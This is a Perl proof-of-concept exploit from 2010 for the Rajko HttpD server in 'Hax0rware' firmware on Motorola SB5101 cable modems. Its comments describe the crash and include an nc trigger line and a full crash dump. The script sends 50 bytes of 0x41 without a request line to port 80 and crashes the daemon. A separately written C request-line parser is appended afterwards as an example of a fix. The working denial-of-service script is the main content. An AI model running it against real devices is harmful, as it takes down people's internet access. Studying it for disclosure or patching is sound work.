#!/usr/bin/perl
# Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit PoC
# Author: Dillon Beresford
# Date: 6/6/2010
# Vendor: SBHacker & Motorola
# Software Link: http://www.sbhacker.net/forum/index.php
# Tested on Hax0rware 1.1 R30, R32 and R39
# Description: Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit
#
# If an unauthenticated user or attacker sends any number of bytes greater than 1
# to port 80 without a proper request line, such as [ GET /somepath/file.cgi ],
# the http daemon crashes the Rajko HttpD thread at 0x8054b9ac.
# The developer of Hax0rware said he has bound the webserver to the modem's local
# IP to prevent attackers from triggering the vuln... This seems to be a quick fix
# at the moment. I'm sure he will eventually fix the bug and update the firmware.
# Motorola and cable providers should warn their customers (there are a number of
# legitimate customers using this firmware for testing). It's important that you
# let customers know about the risk of third-party firmware that isn't open source.
#
# nc 192.168.100.1 80 <sendsomeevil>
# For debugging, telnet into the device at 192.168.100.1 and run the PoC.
#
# >>> YIKES... looks like you may have a problem! <<<
#  r0/zero=00000000  r1/at=fffffffe  r2/v0=805a1800  r3/v1=00000000
#  r4/a0=8054aa58    r5/a1=00000000  r6/a2=00000000  r7/a3=00000000
#  r8/t0=00000000    r9/t1=807bcae4  r10/t2=00000041 r11/t3=000043e0
#  r12/t4=4d154e68   r13/t5=00000000 r14/t6=00000000 r15/t7=00000005
#  r16/s0=8054bacc   r17/s1=00000000 r18/s2=805a1800 r19/s3=00000000
#  r20/s4=00000001   r21/s5=0000002a r22/s6=8054b848 r23/s7=00000001
#  r24/t8=00000000   r25/t9=00000059 r26/k0=00000000 r27/k1=11110017
#  r28/gp=80458fa0   r29/sp=8054b830 r30/fp=8054b960 r31/ra=8054a514
# PC    : 0x8054a534   error addr: 0x00000000
# cause : 0x00000008   status    : 0x1000ff03
# BCM interrupt enable: ffffbff7, status: 00000000
# Bad PC or SP. Can't trace the stack.
#
# Task: Rajko HttpD
# ---------------------------------------------------
# ID:               0x0006
# Handle:           0x8054b9ac
# Set Priority:     23
# Current Priority: 23
# State:            SUSP
# Stack Base:       0x8054acd4
# Stack Size:       3280 bytes
# Stack Used:       1940 bytes
#
#                                                       Stack  Stack  Stack
# TaskId      TaskName                       Priority  State  Size   Used   Margin
# ----------  -----------------------------  --------  -----  -----  -----  ------
# 0x8048f818  Idle Thread                       31     RUN     2048    616    1432
# 0x805131d0  Network alarm support              6     SLEEP   2256   1232    1024
# 0x804924c8  Network support                    7     SLEEP   8192   1704    6488
# 0x80513f20  pthread.00000800                  15     EXIT    7852   1104    6748
# 0x8048a1c8  tStartup                          18     SLEEP  12288   5208    7080
# 0x8054b9ac  Rajko HttpD                       23     SUSP    3280   1940    1340
# 0x807f579c  NonVol Device Async Helper        25     SLEEP   3072    504    2568
# 0x807ebc7c  Motorola Standby Switch Thread    23     SLEEP   4096    440    3656
# 0x807ea984  Motorola Vendor Ctl Thread        23     SLEEP   4096    512    3584
# 0x807f64e8  WDOG                              17     RUN     5120   2784    2336
# 0x807e86b4  BFC Ping Thread                   29     SLEEP   6144    476    5668
# 0x807e4b3c  ConsoleThread                     27     SLEEP  36864   2172   34692
# 0x807d687c  TelnetD                           23     RUN     2256   1980     276
# 0x807c666c  CfgVB Thread                      23     SLEEP   4096    504    3592
# 0x807c501c  DHCM                              25     SLEEP  16384    512   15872
# 0x807befac  Event Log Thread                  25     SLEEP   8192   2184    6008
# 0x8079a51c  Time Of Day Thread                23     SLEEP   6144    456    5688
# 0x8079a98c  CmDocsisIpThread                  23     SLEEP   8192    504    7688
# 0x80793af8  CmBpiManagerThd                   25     SLEEP   8192    508    7684
# 0x8078ff78  CmDsxHelper                       23     SLEEP   8192    504    7688
# 0x807abf50  CmDocsisCtlThread                 21     SLEEP   8192    608    7584
# 0x80788e44  Scan Downstream Thread            23     SLEEP   4096   1428    2668
# 0x80785c20  RateShaping Thread                23     SLEEP   4096    444    3652
# 0x807f65e0  CMHL                              23     SLEEP   4500    368    4132
# 0x807f66d8  CMHH                              21     SLEEP   4500    352    4148
# 0x807f67d0  ENRX                              23     RUN     4500   1028    3472
# 0x807f68c8  ENTX                              23     SLEEP   4500    784    3716
# 0x807f69c0  ELNK                              23     SLEEP   4500    320    4180
# 0x807f6ab8  USTX                              23     SLEEP   4500    340    4160
# 0x807f6bb0  USRX                              23     SLEEP   4500    372    4128
# 0x807f6ca8  UBCT                              19     SLEEP   4500    356    4144
# 0x807f6da0  USRN                              23     SLEEP   4500    340    4160
# 0x806a5a34  DHCP Client Thread                23     SLEEP  12288    508   11780
# 0x807f6e98  IpHalIst                          23     RUN     4500    844    3656
# 0x8069fb98  CmPropaneCtlThread                23     SLEEP   8192   1628    6564
# 0x8069cf3c  IGMP Thread                       23     SLEEP   4096    456    3640
# 0x8069b640  NetToMedia Thread                 23     SLEEP   4096    796    3300
# 0x806975a8  Trap Thread                       23     SLEEP  16384    516   15868
# 0x807f6030  SNMP Thread                       23     SLEEP  20480   1176   19304
# 0x805a7f0c  DHCP Server Thread                23     SLEEP   8192   1448    6744
# 0x8047b410  tNonVolTimer                      30     SLEEP   2048   1028    1020
# Done!
#
# (Motorola Corporation ASCII-art logo omitted)
#
# +----------------------------------------------------------------------------+
# |  Broadband Foundation Classes                                              |
# |                                                                            |
# |  Copyright (c) 1999 - 2007 Broadcom Corporation                            |
# |  Revision: 3.9.33.3 RELEASE                                                |
# |  Features: Console Nonvol Fat HeapManager SNMP Networking USB1.1           |
# +----------------------------------------------------------------------------+
# |  Standard Embedded Target Support for BFC                                  |
# |                                                                            |
# |  Copyright (c) 2003 - 2007 Broadcom Corporation                            |
# |  Revision: 3.0.1 RELEASE                                                   |
# |  Features: PID=0xc011 Bootloader-Rev=2.1.6d                                |
# |  Features: Bootloader-Compression-Support=0x19                             |
# +----------------------------------------------------------------------------+
# |  eCos BFC Application Layer                                                |
# |                                                                            |
# |  Copyright (c) 1999 - 2007 Broadcom Corporation                            |
# |  Revision: 3.0.2 RELEASE                                                   |
# |  Features: eCos Console Cmds, (no Idle Loop Profiler)                      |
# +----------------------------------------------------------------------------+
# |  DOCSIS Cable Modem                                                        |
# |                                                                            |
# |  Copyright (c) 1999 - 2005 Broadcom Corporation                            |
# |  Revision: 3.9.33.3 RELEASE                                                |
# |  Features: AckCel(tm) DOCSIS 1.0/1.1/2.0 Propane(tm) CM SNMP w/Factory MIB |
# |  Features: Support CM Vendor Extension                                     |
# +----------------------------------------------------------------------------+
# |  Motorola Data-Only CM Vendor Extension                                    |
# |                                                                            |
# |  Revision: 3.0.0a RELEASE                                                  |
# |  Features: DHCP Server HTTP Server                                         |
# +----------------------------------------------------------------------------+
# |  Build Date: Apr 29 2009                                                   |
# |  Build Time: 15:08:51                                                      |
# |  Built By:   vobadm02                                                      |
# +----------------------------------------------------------------------------+

use strict;
use warnings;
use Socket;

# 50 bytes of 0x41 with no request line: enough to trigger the crash described above.
my $buff         = "\x41" x 50;
my $cablemodemip = shift || '192.168.100.1';
my $port         = shift || 80;
my $proto        = getprotobyname('tcp');
my $iaddr        = inet_aton($cablemodemip) or die "inet_aton: cannot resolve $cablemodemip";
my $paddr        = sockaddr_in($port, $iaddr);

print "+---------------------------------------------------------------+\n" .
      "| Motorola SB5101 Hax0rware Rajko HttpD Remote Exploit PoC      |\n" .
      "| Motorola: SB5101-2.7.6.0-GA-00-NOSH                           |\n" .
      "| Version: 1.1 R30, R32 and R39                                 |\n" .
      "| Vendor: Motorola Corporation and SBHacker                     |\n" .
      "| Author: Dillon Beresford                                      |\n" .
      "| Date: 6/6/2010                                                |\n" .
      "+---------------------------------------------------------------+\n";

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to cable modem httpd at $cablemodemip on port $port\n";
connect(SOCKET, $paddr) or die "connect: $!";
print "[+] Sending our evil buffer...\n";
print SOCKET $buff . "\n";
print "[+] Payload sent\n";
print "[+] This takes some time, please wait.\n";
print "[+] Don't look at me, look at the LEDs on your modem\n";
close SOCKET or die "close: $!";
sleep(25);
print "[+] Bye Bye Motorola SB5101\n";
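The crash above comes from the daemon mishandling input that carries no proper request line. As an added example that is not code from Hax0rware, SBHacker or this PoC's author, here is a bounds-checked request-line parser in C of the kind a fixed httpd would need: it returns an error for the 50-byte run the PoC sends (so the server can answer 400 Bad Request) instead of walking off the buffer. The struct, function names and token size limits are my assumptions; the firmware's real parser is not shown on the page.

```c
#include <ctype.h>
#include <string.h>

struct request_line { char method[64]; char target[256]; char version[16]; };

/* Copy one token (up to SP or CR/LF) from p into dst without reading past end
 * or overrunning dst. Returns bytes consumed; 0 if empty, too long or non-printable. */
static size_t take_token(const char *p, const char *end, char *dst, size_t cap)
{
    size_t n = 0;
    while (p + n < end && p[n] != ' ' && p[n] != '\r' && p[n] != '\n') {
        if (n + 1 >= cap || !isprint((unsigned char)p[n])) return 0;
        dst[n] = p[n];
        n++;
    }
    dst[n] = '\0';
    return n;
}

/* Parse "METHOD SP target SP HTTP/d.d CRLF" from a raw, unterminated buffer.
 * Returns 0 on success, -1 for anything malformed; never touches memory past
 * buf+len, so junk such as a bare run of bytes yields an error, not a fault. */
int parse_request_line(const char *buf, size_t len, struct request_line *out)
{
    const char *p = buf, *end = buf + len;
    size_t n;
    if (!buf || (n = take_token(p, end, out->method, sizeof out->method)) == 0) return -1;
    p += n;
    if (p >= end || *p++ != ' ') return -1;
    if ((n = take_token(p, end, out->target, sizeof out->target)) == 0) return -1;
    p += n;
    if (p >= end || *p++ != ' ') return -1;
    if ((n = take_token(p, end, out->version, sizeof out->version)) != 8) return -1;
    p += n;
    if (strncmp(out->version, "HTTP/", 5) != 0 || !isdigit((unsigned char)out->version[5]) ||
        out->version[6] != '.' || !isdigit((unsigned char)out->version[7])) return -1;
    /* the request line must end with CRLF inside the buffer */
    return (end - p >= 2 && p[0] == '\r' && p[1] == '\n') ? 0 : -1;
}

/* Constructed input matching the PoC: 50 x 0x41 plus a newline, no request line at all. */
int parse_poc_payload(void)
{
    char buf[51];
    struct request_line rl;
    memset(buf, 'A', 50);
    buf[50] = '\n';
    return parse_request_line(buf, sizeof buf, &rl);
}
```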